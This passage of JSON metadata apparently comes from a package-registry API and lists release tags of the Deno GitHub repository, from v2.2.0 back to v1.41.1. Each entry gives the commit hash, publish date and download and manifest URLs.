//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/